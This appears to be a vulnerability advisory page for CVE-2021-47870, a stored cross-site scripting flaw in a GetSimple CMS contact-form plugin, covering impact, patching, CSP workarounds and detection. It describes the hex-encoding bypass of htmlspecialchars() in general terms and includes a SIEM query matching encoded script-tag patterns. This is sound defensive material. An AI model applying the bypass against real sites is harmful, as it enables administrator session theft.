Login Sign Up

CVE-2021-47870

5.4 MEDIUM
Cross-Site Scripting

📋 TL;DR

This stored XSS vulnerability in GetSimple CMS My SMTP Contact Plugin allows attackers to inject malicious JavaScript that executes in administrators' browsers. Attackers can bypass the plugin's htmlspecialchars() sanitization using hex-encoded characters. All administrators using the vulnerable plugin version are affected.

💻 Affected Systems

Products:
  • GetSimple CMS My SMTP Contact Plugin
Versions: 1.1.2 and earlier
Operating Systems: All
Default Config Vulnerable: ⚠️ Yes
Notes: Requires administrator to view malicious content; plugin must be installed and active.

📦 What is this software?

Getsimplecms by Get Simple

View all CVEs affecting Getsimplecms →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Administrator account compromise leading to full CMS takeover, data theft, or server compromise if combined with other vulnerabilities.

🟠

Likely Case

Session hijacking, credential theft, or malicious actions performed with administrator privileges.

🟢

If Mitigated

Limited to client-side impact if proper CSP headers and input validation are in place.

🌐 Internet-Facing: HIGH
🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: CONFIRMED
Unauthenticated Exploit: ✅ No
Complexity: LOW

Exploit requires attacker to submit malicious contact form data; administrator must view the submission.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 1.1.3 or later

Vendor Advisory: https://github.com/GetSimpleCMS/GetSimpleCMS

Restart Required: No

Instructions:

1. Update plugin to version 1.1.3 or later via GetSimple CMS admin panel. 2. Verify update completes successfully. 3. Clear browser cache and test contact form functionality.

🔧 Temporary Workarounds

Disable vulnerable plugin

all

Temporarily disable My SMTP Contact Plugin until patched

Navigate to GetSimple CMS admin > Plugins > Deactivate 'My SMTP Contact Plugin'

Implement Content Security Policy

all

Add CSP headers to block inline script execution

Add to .htaccess: Header set Content-Security-Policy "default-src 'self'; script-src 'self'"
Or configure in web server settings

🧯 If You Can't Patch

  • Restrict administrator access to trusted networks only
  • Implement web application firewall rules to block XSS payloads

🔍 How to Verify

Check if Vulnerable:

Check plugin version in GetSimple CMS admin panel under Plugins > My SMTP Contact Plugin

Check Version:

Check GetSimple CMS admin interface or plugin directory version.txt file

Verify Fix Applied:

Confirm plugin version is 1.1.3 or higher and test contact form with basic XSS payloads

📡 Detection & Monitoring

Log Indicators:

  • Unusual contact form submissions with hex-encoded characters
  • Multiple failed login attempts from administrator accounts

Network Indicators:

  • HTTP requests containing hex-encoded script tags in contact form data

SIEM Query:

source="web_logs" AND ("%3Cscript" OR "%26%23x" OR "contact-form") AND status=200

📊 Metadata

CVE ID: CVE-2021-47870
CVSS v3 Score: 5.4 (MEDIUM)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
CWE: CWE-79
EPSS Score: 0.06% exploit probability (17.4th percentile)
Published: January 21, 2026
Last Updated: March 6, 2026

🔗 References

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2021-47870, you might also want to check these:

CVE-2021-39199 10.0

CVE-2021-39199 is a critical cross-site scripting (XSS) vulnerability in the remark-html Node.js lib...

Same vulnerability type (CWE-79)
CVE-2021-32671 10.0

This vulnerability in Flarum forum software allows attackers to inject malicious HTML/JavaScript int...

Same vulnerability type (CWE-79)
CVE-2021-32798 10.0

CVE-2021-32798 is a critical vulnerability in Jupyter Notebook that allows malicious notebook files ...

Same vulnerability type (CWE-79)